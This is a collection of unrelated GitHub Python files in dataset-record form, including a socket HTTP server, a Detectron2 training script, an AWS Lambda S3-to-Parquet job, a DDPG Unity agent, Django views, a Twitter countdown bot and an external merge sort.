tags which are only used once. \"\"\"\n return len(self._artistTags.getArtistsWithTag(tag)) >= self._minTagCount\n\n def getArtistTags(self):\n return self._artistTags\n\n def getArtists(self):\n return self._artists\n\n def getStatsString(self):\n return 'Stats: #artists: %d, #tags: %d' % (len(self._artists), self._artistTags.getTagCount())\n\n","repo_name":"FahmiA/MatchThatGenre","sub_path":"TagGraphGenerator/ArtistWeightCalc.py","file_name":"ArtistWeightCalc.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"37776546002","text":"import socket\nfrom threading import Lock, Thread\n\nfrom request import Request\nfrom response import Response\n\nclass Server:\n BUFFERSIZE = 1024\n def __init__(self, host: str, port: int, debug:bool=False):\n self._host = host\n self._port = port\n self._s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self._debug = debug\n self._print_lock = Lock()\n\n def initialize(self):\n self._s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self._s.bind((self._host, self._port))\n self._s.listen(5) # Don't know what the number does and seems to not matter\n self._debug_print(f\"listening on {self._host}:{self._port}\")\n self._running = False\n\n def run(self):\n self._running = True\n while self._running:\n try:\n conn, addr = self._s.accept()\n self._debug_print(f\"Accepted connection from {str(addr)}\")\n t = Thread(target=self.handle_client, args=(conn, addr))\n t.start()\n except KeyboardInterrupt:\n self._running = False\n\n self._debug_print(\"Closing server\")\n self._s.close()\n\n def handle_client(self, conn: socket.socket, addr):\n data = conn.recv(Server.BUFFERSIZE)\n req = Request()\n if req.parse(data):\n self._debug_print(f\"Incoming {req.get_method().value} request for {req._path} from {str(addr)}\")\n resp = Response()\n resp.compose_response(req)\n to_send = resp.encode()\n conn.send(to_send)\n\n self._debug_print(f\"Closing connection from {str(addr)}\")\n conn.close()\n\n def _debug_print(self, msg):\n if self._debug:\n with self._print_lock:\n print(msg)\n","repo_name":"yutytuty/ImprovedHttpServer","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"33213630671","text":"import sqlite3\r\n\r\n\r\nclass Review:\r\n dbpath = \"data/stacked.db\"\r\n\r\n\r\n def __init__(self, pk,review,company,time_stamp,pros,cons,users_pk ):\r\n self.pk = pk\r\n self.review = review\r\n self.company = company\r\n self.time_stamp = time_stamp\r\n self.pros = pros\r\n self.cons = cons\r\n self.users_pk=users_pk\r\n \r\n\r\n\r\n\r\n def _insert(self):\r\n with sqlite3.connect(self.dbpath) as conn:\r\n cursor = conn.cursor()\r\n SQL = \"\"\"INSERT INTO reviews(\r\n review,company,time_stamp,pros,cons,users_pk) \r\n VALUES (?,?,?,?,?,?);\"\"\"\r\n\r\n values = (self.review,self.company,self.time_stamp,self.pros,self.cons,self.users_pk)\r\n cursor.execute(SQL, values)\r\n\r\n\r\n def save(self):\r\n if self.pk:\r\n self._update()\r\n else:\r\n self._insert()\r\n\r\n\r\n\r\n @classmethod\r\n def count_reviews(cls,company):\r\n with sqlite3.connect(cls.dbpath) as conn:\r\n cursor = conn.cursor()\r\n SQL = \"\"\" SELECT COUNT(review) FROM reviews WHERE company=?\"\"\"\r\n cursor.execute(SQL, (company,))\r\n row = cursor.fetchall()\r\n return row\r\n\r\n\r\n @classmethod\r\n def get_reviews(cls,company):\r\n with sqlite3.connect(cls.dbpath) as conn:\r\n cursor = conn.cursor()\r\n SQL = \"\"\" SELECT review,time_Stamp ,pros,cons FROM reviews WHERE company=?\"\"\"\r\n cursor.execute(SQL, (company,))\r\n row = cursor.fetchall()\r\n return row","repo_name":"kbrien11/stackedcash","sub_path":"app/review.py","file_name":"review.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"15356248658","text":"import logging\nfrom abc import abstractmethod\nfrom typing import List, Union, Optional, Tuple\n\nfrom qiskit.aqua.operators.converters.converter_base import ConverterBase\nfrom qiskit.aqua.operators.operator_base import OperatorBase\nfrom qiskit.circuit import ParameterExpression, ParameterVector\n\nlogger = logging.getLogger(__name__)\n\n\nclass CircuitGradient(ConverterBase):\n r\"\"\"Circuit to gradient operator converter.\n\n Converter for changing parameterized circuits into operators\n whose evaluation yields the gradient with respect to the circuit parameters.\n\n This is distinct from DerivativeBase converters which take gradients of composite\n operators and handle things like differentiating combo_fn's and enforcing product rules\n when operator coefficients are parameterized.\n\n CircuitGradient - uses quantum techniques to get derivatives of circuits\n DerivativeBase - uses classical techniques to differentiate operator flow data structures\n \"\"\"\n\n # pylint: disable=arguments-differ\n @abstractmethod\n def convert(self,\n operator: OperatorBase,\n params: Optional[Union[ParameterExpression, ParameterVector,\n List[ParameterExpression],\n Tuple[ParameterExpression, ParameterExpression],\n List[Tuple[ParameterExpression, ParameterExpression]]]]\n = None,\n ) -> OperatorBase:\n r\"\"\"\n Args:\n operator: The operator we are taking the gradient of\n params: The parameters we are taking the gradient wrt: ω\n If a ParameterExpression, ParameterVector or List[ParameterExpression] is given,\n then the 1st order derivative of the operator is calculated.\n If a Tuple[ParameterExpression, ParameterExpression] or\n List[Tuple[ParameterExpression, ParameterExpression]]\n is given, then the 2nd order derivative of the operator is calculated.\n\n Returns:\n An operator whose evaluation yields the Gradient.\n\n Raises:\n ValueError: If ``params`` contains a parameter not present in ``operator``.\n \"\"\"\n raise NotImplementedError\n","repo_name":"qiskit-community/qiskit-aqua","sub_path":"qiskit/aqua/operators/gradients/circuit_gradients/circuit_gradient.py","file_name":"circuit_gradient.py","file_ext":"py","file_size_in_byte":2299,"program_lang":"python","lang":"en","doc_type":"code","stars":564,"dataset":"github-code","pt":"66"}
+{"seq_id":"29597493332","text":"'''\n2020/10/29\n모델 새로 학습 시킬 때 output folder 지우고 val_result 안에 있는 사진 파일 지우거나 백업\nvideorighter\n'''\n\nfrom detectron2.structures import BoxMode\nfrom detectron2.utils.logger import setup_logger\n\nsetup_logger()\nimport numpy as np\nimport os, json, cv2, random\nimport matplotlib.pyplot as plt\n\nfrom detectron2 import model_zoo\nfrom detectron2.engine import DefaultPredictor, DefaultTrainer\nfrom detectron2.config import get_cfg\nfrom detectron2.utils.visualizer import Visualizer, ColorMode\nfrom detectron2.data import MetadataCatalog, DatasetCatalog\nfrom PIL import ImageFile\nimport time\n\nImageFile.LOAD_TRUNCATED_IMAGES = True\n\n\ndef get_facelip_dtcs(json_dir):\n json_file = json_dir\n with open(json_file) as f:\n imgs_anns = json.load(f)\n dataset_dicts = []\n for z in range(len(imgs_anns['images'])):\n record = {}\n record['file_name'] = imgs_anns['images'][z]['file_name']\n record['image_id'] = imgs_anns['images'][z]['id']\n record['width'] = imgs_anns['images'][z]['width']\n record['height'] = imgs_anns['images'][z]['height']\n anno_list = []\n for i in range(len(imgs_anns['annotations'])):\n anno = {}\n if imgs_anns['images'][z]['id'] == imgs_anns['annotations'][i]['image_id']:\n anno['bbox'] = imgs_anns['annotations'][i]['bbox'].copy() # check\n anno['bbox_mode'] = BoxMode.XYWH_ABS\n anno['segmentation'] = []\n anno['category_id'] = imgs_anns['annotations'][i]['category_id']-1 # check\n anno_list.append(anno)\n record['annotations'] = anno_list\n dataset_dicts.append(record)\n return dataset_dicts\ndataset_dicts_train = get_facelip_dtcs(\"/home/videorighter/detectron/FACELIP_DATA_train/annotations/output_train.json\")\nprint(len(dataset_dicts_train))\n\nstart = time.time()\n############################### get resister, metadata #################################\nfor d in [\"train\", \"val\"]:\n DatasetCatalog.register(\"facelip_\" + d, lambda d=d: get_facelip_dtcs(\n \"/home/videorighter/detectron/FACELIP_DATA_\" + d + \"/annotations/output_\" + d + \".json\"))\n MetadataCatalog.get(\"facelip_\" + d).set(thing_classes=[\"lip\", \"face\", \"product\"])\ntrain_facelip_metadata = MetadataCatalog.get(\"facelip_train\")\nval_facelip_metadata = MetadataCatalog.get(\"facelip_val\")\n\n\n################################# training model #######################################\ncfg = get_cfg()\ncfg.merge_from_file(\n \"/home/videorighter/detectron/detectron2/configs/COCO-Detection/faster_rcnn_X_101_32x8d_FPN_3x.yaml\")\ncfg.DATASETS.TRAIN = (\"facelip_train\",)\ncfg.DATASETS.TEST = () # no metrics implemented for this dataset\ncfg.DATALOADER.NUM_WORKERS = 2\ncfg.MODEL.MASK_ON = False\n# cfg.MODEL.BACKBONE.FREEZE_AT = 0\ncfg.MODEL.WEIGHTS = \"/home/videorighter/detectron/detectron2/configs/COCO-Detection/model_final_68b088.pkl\" # initialize from model zoo\ncfg.SOLVER.IMS_PER_BATCH = 1\ncfg.SOLVER.BASE_LR = 0.0001\ncfg.SOLVER.MAX_ITER = 4000 # 300 iterations seems good enough, but you can certainly train longer\ncfg.MODEL.ROI_HEADS.BATCH_SIZE_PER_IMAGE = 128 # faster, and good enough for this toy dataset\ncfg.MODEL.ROI_HEADS.NUM_CLASSES = 3 # 2 classes (lip, face, product)\n\nos.makedirs(cfg.OUTPUT_DIR, exist_ok=True)\ntrainer = DefaultTrainer(cfg)\n\n# 이전에 학습시킨 pth파일로 resume할 것인지 여부\ntrainer.resume_or_load(resume=True)\ntrainer.train()\n\n\n################################# model test ####################################\ncfg.DATASETS.TEST = (\"facelip_val\",) # no metrics implemented for this dataset\ncfg.MODEL.WEIGHTS = os.path.join(cfg.OUTPUT_DIR, 
\"model_final.pth\")\ncfg.MODEL.RETINANET.SCORE_THRESH_TEST = 0.2 # set the testing threshold for this model\npredictor = DefaultPredictor(cfg)\n\n\n############################# validation print ##################################\ndataset_dicts_val = get_facelip_dtcs(\"/home/videorighter/detectron/FACELIP_DATA_val/annotations/output_val.json\")\nfor d in dataset_dicts_val:\n im = cv2.imread(d[\"file_name\"])\n outputs = predictor(im)\n v = Visualizer(im[:, :, ::-1],\n metadata=val_facelip_metadata,\n scale=1)\n v = v.draw_instance_predictions(outputs[\"instances\"].to(\"cpu\"))\n img = v.get_image()[:, :, ::-1]\n cv2.imwrite(os.path.join(\"/home/videorighter/detectron/val_result\", os.path.split(d[\"file_name\"])[1]), img)\n\n############################# validation score ###################################\nfrom detectron2.evaluation import COCOEvaluator, inference_on_dataset\nfrom detectron2.data import build_detection_test_loader\n\nevaluator = COCOEvaluator(\"facelip_val\", cfg, False, output_dir=\"./output_val/\")\nval_loader = build_detection_test_loader(cfg, \"facelip_val\")\nprint(inference_on_dataset(trainer.model, val_loader, evaluator))\nprint(\"running time: \", time.time() - start)","repo_name":"videorighter/object_detection","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4910,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"}
+{"seq_id":"32501108849","text":"#12.lista\ndef productoEscalar(a,b):\n producto=0\n for i in range(len(a)):\n producto +=a[i]*b[i]\n return producto\n \n \n \n \nd=[3,2,8,7,8,1,9,10]\ne=[3,2,8,7,8,1,9,10]\nprint(productoEscalar(d,e))","repo_name":"anaicm/Principio_Programacion_Python","sub_path":"practica 8/12.listas.2.py","file_name":"12.listas.2.py","file_ext":"py","file_size_in_byte":223,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"71136930772","text":"import pika\nimport json\n\n# Connect to RabbitMQ\nconnection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))\nchannel = connection.channel()\n\n\n# Function will be applied then message received\ndef callback(ch, method, properties, body):\n if properties.content_type == 'application/json':\n d = json.loads(body.decode())\n print(\" [x] Received %r\" % d)\n else:\n print(\" [x] Received %r\" % body.decode())\n\n\nchannel.queue_declare(queue='hello') # declare queue just in case it does not exists\n\nchannel.basic_consume(queue='hello', # name of queue\n auto_ack=True, # if python crashes => do not send message back to queue\n # delete message from queue immediately (without waiting for response from consumer)\n on_message_callback=callback) # function to be applied\n\nprint(' [*] Waiting for messages. To exit press CTRL+C')\nchannel.start_consuming()\n","repo_name":"DmitriiDenisov/rabbitmq_lab","sub_path":"tutorial_1/receive.py","file_name":"receive.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"}
+{"seq_id":"39080353890","text":"\"\"\"\nExample taken from here:\nhttps://realpython.com/async-io-python/\n\na corouting makerandom() keeps producing random int\nin the range (0, 10). Until one of them exceeds a threshold,\nlet multiple calls of this corouting not need to wait\nfor each other to complete in succession.\n\"\"\"\n\nimport asyncio\nimport random\n\n# ANSI colors\nc = (\n \"\\033[0m\", # End of color\n \"\\033[36m\", # Cyan\n \"\\033[91m\", # Red\n \"\\033[35m\", # Magenta\n)\n\nasync def randint(a: int, b: int) -> int:\n return random.randint(a, b)\n\nasync def makerandom(idx: int, threshold: int = 6) -> int:\n print(c[idx + 1] + f\"Initiated makerandom({idx}).\")\n i = await randint(0, 10)\n while i <= threshold:\n print(c[idx + 1] + f\"makerandom({idx}) == {i} too low; retrying.\")\n await asyncio.sleep(idx + 1)\n i = await randint(0, 10)\n \n print(c[idx + 1] + f\"---> Finished: makerandom({idx}) == {i}\" + c[0])\n return i\n\nasync def main():\n # gather tasks\n res = await asyncio.gather(\n *(makerandom(i, 10 - i -1) for i in range(3))\n )\n return res\n\nif __name__ == \"__main__\":\n random.seed(444)\n r1, r2, r3 = asyncio.run(main())\n print()\n print(f\"r1: {r1}, r2: {r2}, r3: {r3}\")","repo_name":"adikabintang/learn-python","sub_path":"22_asyncio/2_rand.py","file_name":"2_rand.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"342481725","text":"# awswrangler used toaccess files stored in s3 directly\r\nimport awswrangler as wr\r\nimport pandas as pd\r\nimport urllib.parse\r\nimport os\r\n\r\n# Temporary hard-coded AWS Settings; i.e. to be set as OS variable in Lambda\r\n\r\n# Some values that shouldn't be stored in the code are stored on the pc in external file \r\n# and accessed using os.environ[] method\r\n# \r\nos_input_s3_cleansed_layer = os.environ['s3_cleansed_layer']\r\nos_input_glue_catalog_db_name = os.environ['glue_catalog_db_name']\r\nos_input_glue_catalog_table_name = os.environ['glue_catalog_table_name']\r\nos_input_write_data_operation = os.environ['write_data_operation'] # where we want to append data\r\n\r\n\r\ndef lambda_handler(event, context):\r\n # Get the object from the event and show its content type\r\n\r\n # Reading the file from the s3\r\n # It will use the environ variable to get our bucket name\r\n\r\n bucket = event['Records'][0]['s3']['bucket']['name']\r\n # Will use key provided inside the variable\r\n key = urllib.parse.unquote_plus(event['Records'][0]['s3']['object']['key'], encoding='utf-8')\r\n try:\r\n\r\n # Creating DF from content\r\n df_raw = wr.s3.read_json('s3://{}/{}'.format(bucket, key))\r\n\r\n # Extract required columns:\r\n df_step_1 = pd.json_normalize(df_raw['items'])\r\n\r\n # Write to S3\r\n wr_response = wr.s3.to_parquet(\r\n df=df_step_1,\r\n path=os_input_s3_cleansed_layer,\r\n dataset=True,\r\n database=os_input_glue_catalog_db_name,\r\n table=os_input_glue_catalog_table_name,\r\n mode=os_input_write_data_operation\r\n )\r\n\r\n return wr_response\r\n except Exception as e:\r\n print(e)\r\n print('Error getting object {} from bucket {}. Make sure they exist and your bucket is in the same region as this function.'.format(key, bucket))\r\n raise e","repo_name":"VaiibhavThatai/YouTube-Data-Pipeline-Using-AWS","sub_path":"lambda_function_yt.py","file_name":"lambda_function_yt.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"72920985489","text":"from unityagents import UnityEnvironment\nimport numpy as np\n\nenv = UnityEnvironment(file_name='Reacher.exe')\n\n# get the default brain\nbrain_name = env.brain_names[0]\nbrain = env.brains[brain_name]\n\n# reset the environment\nenv_info = env.reset(train_mode=True)[brain_name]\n\n# number of agents\nnum_agents = len(env_info.agents)\nprint('Number of agents:', num_agents)\n\n# size of each action\naction_size = brain.vector_action_space_size\nprint('Size of each action:', action_size)\n\n# examine the state space\nstates = env_info.vector_observations\nstate_size = states.shape[1]\nprint('There are {} agents. Each observes a state with length: {}'.format(num_agents, state_size))\nprint('The state for the first agent looks like:', states[0])\n\nenv_info = env.reset(train_mode=False)[brain_name] # reset the environment\n# states = env_info.vector_observations # get the current state (for each agent)\n# scores = np.zeros(num_agents) # initialize the score (for each agent)\n# while True:\n# actions = np.random.randn(num_agents, action_size) # select an action (for each agent)\n# actions = np.clip(actions, -1, 1) # all actions between -1 and 1\n# env_info = env.step(actions)[brain_name] # send all actions to tne environment\n# next_states = env_info.vector_observations # get next state (for each agent)\n# rewards = env_info.rewards # get reward (for each agent)\n# dones = env_info.local_done # see if episode finished\n# scores += env_info.rewards # update the score (for each agent)\n# states = next_states # roll over states to next time step\n# if np.any(dones): # exit loop if episode finished\n# break\n# print('Total score (averaged over agents) this episode: {}'.format(np.mean(scores)))\n\nimport gym\nimport random\nimport torch\nimport numpy as np\nfrom collections import deque\nimport matplotlib.pyplot as plt\n#%matplotlib inline\n\nfrom ddpg_agent import Agent\n\n# create single DDPG Agent\nagent = Agent(state_size=state_size, action_size=action_size, random_seed=10)\n\ndef ddpg(n_episodes=200, max_t=1000):\n scores_deque = deque(maxlen=100)\n scores = []\n max_score = -np.Inf\n for i_episode in range(1, n_episodes+1):\n\n # reset the environment\n env_info = env.reset(train_mode=True)[brain_name]\n states = env_info.vector_observations # NOTE: size =\n\n agent.reset()\n score = 0\n for t in range(max_t):\n actions = agent.act(states)\n\n env_info = env.step(actions)[brain_name] # send all actions to tne environment\n next_states = env_info.vector_observations # get next state (for each agent)\n rewards = env_info.rewards # get reward (for each agent)\n dones = env_info.local_done # see if episode finished\n\n agent.step(states, actions, rewards, next_states, dones)\n states = next_states\n score += np.mean(rewards)\n if any(dones):\n break\n\n scores_deque.append(score)\n scores.append(score)\n print('\\rEpisode {}\\tAverage Score: {:.2f}\\tScore: {:.2f}'.format(i_episode, np.mean(scores_deque), score), end=\"\")\n if i_episode % 100 == 0:\n torch.save(agent.actor_local.state_dict(), 'checkpoint_actor.pth')\n torch.save(agent.critic_local.state_dict(), 'checkpoint_critic.pth')\n print('\\rEpisode {}\\tAverage Score: {:.2f}'.format(i_episode, np.mean(scores_deque)))\n return scores\n\nscores = ddpg()\n\nfig = plt.figure()\nax = fig.add_subplot(111)\nplt.plot(np.arange(1, len(scores)+1), scores)\nplt.ylabel('Score')\nplt.xlabel('Episode 
#')\nplt.show()","repo_name":"puggybumper/drlnd_p2_reacher","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"9490297540","text":"k = \"keyence\"\nS = input()\nnum = len(k)\nrem = len(S) - num\n\nflag = False\nif S == k:\n flag = True\n\nfor i in range(len(S)-rem):\n if S[0:i] + S[i+rem:] == k:\n flag = True\nif flag:\n print(\"YES\")\nelse:\n print(\"NO\")\n","repo_name":"lilium513/competition_programing","sub_path":"keyence/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"73828661969","text":"from django.shortcuts import render, get_object_or_404, redirect, reverse\nfrom .models import Feature, FeatureComment\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import FeatureForm, FeatureCommentForm\n\n# Create your views here.\n@login_required()\ndef all_features(request):\n all_features = Feature.objects.all()\n return render(request, \"features.html\", {'all_features':all_features} )\n\n@login_required()\ndef upvote_feature(request, id):\n \"\"\"\n A view that upvotes the selected bug\n \"\"\"\n feature = Feature.objects.get(pk=id)\n feature.upvotes += 1\n feature.save()\n return redirect(all_features)\n\n@login_required()\ndef add_feature(request):\n if request.method == \"POST\":\n submitted_form = FeatureForm(request.POST, request.FILES)\n if submitted_form.is_valid():\n submitted_form.save()\n return redirect(all_features)\n else:\n return(request,\"add_feature.html\",{\n 'form':submitted_form\n })\n else:\n toadd_form = FeatureForm()\n return render(request,\"add_feature.html\",{\n 'form' : toadd_form\n })\n\n@login_required()\ndef edit_feature(request, id):\n edit_item = get_object_or_404(Feature, pk=id)\n if request.method == \"POST\":\n submitted_form = FeatureForm(request.POST, instance=edit_item)\n if submitted_form.is_valid():\n submitted_form.save()\n return redirect(all_features)\n else:\n form = FeatureForm(instance=edit_item)\n return render(request, 'edit_feature.html',{\n 'item_form':form\n })\n\n@login_required()\ndef delete_feature(request, id):\n delete_item = get_object_or_404(Feature, pk=id)\n if request.method == \"POST\":\n delete_item.delete()\n return redirect(all_features)\n else:\n return render(request, 'confirm-delete.html',{\n 't':delete_item\n })\n\n","repo_name":"Code-Institute-Submissions/fullstack-project","sub_path":"features/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"35677369393","text":"import pytz\nfrom datetime import datetime\nimport time\nimport random\n\ndef variable_ratio_daily_countdown_tweet(api,delay_after_tweeting=0,tweet_inverse_odds=15):\n \"\"\"tweets out a daily countdown to the wellington spatial plan submission\n does so probabilistically, i.e., when run n times a day, each time it is run there is a 1/n chance it will tweet\n so as to spread the tweets right across the period.\n \"\"\"\n\n #get new zealand timezone\n nztz = pytz.timezone(\"Pacific/Auckland\")\n #get now and today\n now = datetime.now(nztz)\n today = datetime.date(now)\n\n spatial_plan_deadline = datetime.strptime(\"2020-10-05 17:00\",\"%Y-%m-%d %H:%M\")\n days_left_to_submit = (spatial_plan_deadline.date() - today).days\n\n\n # for tweets going out between 8 AM and up to 11 PM\n permitted_start_time = datetime.combine(today,datetime.strptime(\"07:59\", \"%H:%M\").time()).astimezone(nztz)\n permitted_end_time = datetime.combine(today, datetime.strptime(\"22:50\", \"%H:%M\").time()).astimezone(nztz)\n\n #determine if now is within the permitted range\n is_within_time_range = (now>permitted_start_time) & (now < permitted_end_time)\n\n #this is about 15 hours of the day so that's what we'll use\n chance_of_tweeting = 1/tweet_inverse_odds\n random.seed(datetime.now())\n lucky_hour_dip = random.random()\n print(\"lucky hour dip number is \" + str(lucky_hour_dip))\n is_lucky_hour = (lucky_hour_dip 0:\n print(\"tweeting a reminder about wellington spatial plan\")\n tweet_version = random.sample([0,1,2,3],1)[0]\n if tweet_version==0:\n tweet_text = (str(days_left_to_submit) +\n \" days left to submit for the Wellington Spatial Plan. \" +\n \"All it takes is 10 minutes for you to influence the future of Wellington.\" +\n \" Submit here: https://planningforgrowth.wellington.govt.nz/spatial-plan\"\n )\n elif tweet_version==1:\n tweet_text = (\n \"There are \" + str(days_left_to_submit) + \" days to get in a submission for the Wellington Spatial Plan. \" +\n \"It sets the limits for how much housing can be built in Wellington for the next THIRTY YEARS! \" +\n \"Here's the link to submit. https://planningforgrowth.wellington.govt.nz/spatial-plan\"\n )\n elif tweet_version==2:\n tweet_text = (\n str(days_left_to_submit) + \" sleeps left until the submission deadline for the Wellington Spatial Plan closes. \" +\n \"It takes 10 minutes of your time - if you haven't already, get your submission in now. \" +\n \"https://planningforgrowth.wellington.govt.nz/spatial-plan\"\n )\n elif tweet_version==3:\n tweet_text = (\n str(days_left_to_submit) + \" days left to have a say on the Wellington Spatial Plan. \" +\n \"It takes 10 minutes and determines whether Wellington housing is affordable for the next 30 years.\" +\n \" tell the council we need more housing! \" +\n \"https://planningforgrowth.wellington.govt.nz/spatial-plan\"\n )\n\n print(tweet_text)\n\n\n api.update_status(tweet_text)\n\n time.sleep(delay_after_tweeting)\n\n# from authenticate import *\n#\n# api = get_authenticated_api()\n#\n# for i in range(0,10):\n# variable_ratio_daily_countdown_tweet(api,1)\n\n\n\n","repo_name":"bjsmith/housingbot","sub_path":"daily_countdown.py","file_name":"daily_countdown.py","file_ext":"py","file_size_in_byte":3500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"30231440176","text":"#!/usr/bin/env python3\n\nimport sys\nimport math\nimport csv\n\ncolmapping={}\ncolindexing={}\nmainmemorysize=0\nchunksize=0\nheap=[]\n\nclass Node:\n\tdef __init__(self):\n\t\t#data will be a list\n\t\tself.data=[]\n\t\tself.fp=-1\n\ndef readfile(filename):\n lines=[]\n f1=open(filename)\n lines=f1.readlines()\n f1.close()\n return lines\n\ndef readmetadata(filename):\n\tlines=readfile(filename)\n\tj=0\n\tfor i in lines:\n\t\ta,b=i.split(\",\")\n\t\tcolmapping[a]=int(b)\n\t\tcolindexing[a]=j\n\t\tj+=1\n\t\t\ndef readwordfromlines(line):\n\twords=[]\n\toffset=0\n\tfor i in colmapping.values():\n\t\twords.append(line[offset:offset+i])\n\t\toffset=offset+i+2\n\treturn words\n\ndef parseinput(cmddata):\n\tinput_file=cmddata[1]\n\toutput_file=cmddata[2]\n\tsize=int(cmddata[3])*1024*1024\n\tnthread=int(cmddata[4])\n\tcode=cmddata[5]\n\tif(code=='dsc'):\n\t\tflag=True\n\telif(code=='asc'):\n\t\tflag=False\n\telse:\n\t\tprint('PLease specify the correct sorting order')\n\t\texit()\n\tcolumns=[]\n\ti=6\n\twhile(i0):\n\t\tfilearray.append('temp'+str(findex)+'.txt')\n\t\tf2=open(filearray[findex],'w')\n\t\ttempresult=sortdata(tempresult,columns,flag)\n\t\twritelistoflist(f2,tempresult)\n\t\tf2.close()\n\t\tfindex+=1\n\tf1.close()\n\treturn filearray\n\ndef compare(l1,l2,columns,flag):\n\tif(flag):\n\t\tfor j in columns:\n\t\t\ti=colindexing[j]\n\t\t\tif(l1[i]>l2[i]):\n\t\t\t\treturn True\n\t\t\telif(l1[i]==l2[i]):\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\treturn False\n\t\treturn False\n\telse:\n\t\tfor j in columns:\n\t\t\ti=colindexing[j]\n\t\t\tif(l1[i]=0):\n\t\tminheapify(i,columns,flag)\n\t\ti-=1\n\ndef adjust(pos,columns,flag):\n\tchild=pos\n\tparent=math.floor((child-1)/2)\n\n\twhile(parent>=0 and compare(heap[child].data,heap[parent].data,columns,flag)):\n\t\ttemp=heap[child]\n\t\theap[child]=heap[parent]\n\t\theap[parent]=temp\n\n\t\tchild=parent\n\t\tparent=math.floor((child-1)/2)\n\ndef removemin(columns,flag):\n\ttemp=heap[0]\n\t\n\theap[0]=heap[len(heap)-1]\n\theap.pop()\n\n\tminheapify(0,columns,flag)\n\treturn temp\n\ndef mergesplittedfiles(filearray,columns,flag):\n\n\tfilepointer=[None]*len(filearray)\n\tfor i in range(len(filearray)):\n\t\tfilepointer[i]=open(filearray[i])\n\t\tdata=readoneline(filepointer[i])\n\t\ttemp=Node()\n\t\ttemp.fp=i\n\t\ttemp.data=data\n\t\theap.append(temp)\n\n\tbuildminheap(columns,flag)\n\n\tfpwrite=open('tempoutput.txt','w')\n\tfileclosecount=0\n\n\twhile(fileclosecount!=len(filearray)):\n\t\ttemp=removemin(columns,flag)\n\t\tresult=[]\n\t\tresult.append(temp.data)\n\t\twritelistoflist(fpwrite,result)\n\n\t\tdata=readoneline(filepointer[temp.fp])\n\t\tif(len(data)!=0):\n\t\t\ttemp.data=data\n\t\t\theap.append(temp)\n\t\t\tadjust(len(heap)-1,columns,flag)\n\t\telse:\n\t\t\tfileclosecount+=1\n\n\tfor i in range(len(filearray)):\n\t\tfilepointer[i]=open(filearray[i])\n\treturn 1\n\ncmddata=sys.argv\nif(len(cmddata)<6):\n\tprint('PLease enter all parameter')\nelse:\n\tinput_file,output_file,mainmemorysize,nthread,flag,columns=parseinput(cmddata)\n\treadmetadata('metadata.txt')\n\tchunksize=calcchunksize()\n\n\tprintstats()\n\t\n\tfilearray=splitdata_sorted(input_file,columns,flag)\n\tmergesplittedfiles(filearray,columns,flag)\n","repo_name":"shanu-sh/TwoPhaseMergeSort","sub_path":"q1.py","file_name":"q1.py","file_ext":"py","file_size_in_byte":4908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"30134471056","text":"import unittest\n\nfrom clib.utils import load_class, get_index_from_label\n\n\nclass LoadClassTest(unittest.TestCase):\n def setUp(self):\n self.vocfilepath = 'tests/data/voc.names'\n self.tags = {0: 'hoge', 1: 'fuga'}\n\n def test_load_class(self):\n self.assertEqual(load_class(self.vocfilepath),\n {0: 'aeroplane', 1: 'bicycle', 2: 'bird',\n 3: 'boat', 4: 'bottle', 5: 'bus', 6: 'car',\n 7: 'cat', 8: 'chair', 9: 'cow',\n 10: 'diningtable', 11: 'dog', 12: 'horse',\n 13: 'motorbike', 14: 'person',\n 15: 'pottedplant', 16: 'sheep', 17: 'sofa',\n 18: 'train', 19: 'tvmonitor'})\n\n def test_get_index(self):\n self.assertEqual(get_index_from_label(self.tags, 'fuga'), 1),\n","repo_name":"Swall0w/clib","sub_path":"tests/utils/test_load.py","file_name":"test_load.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
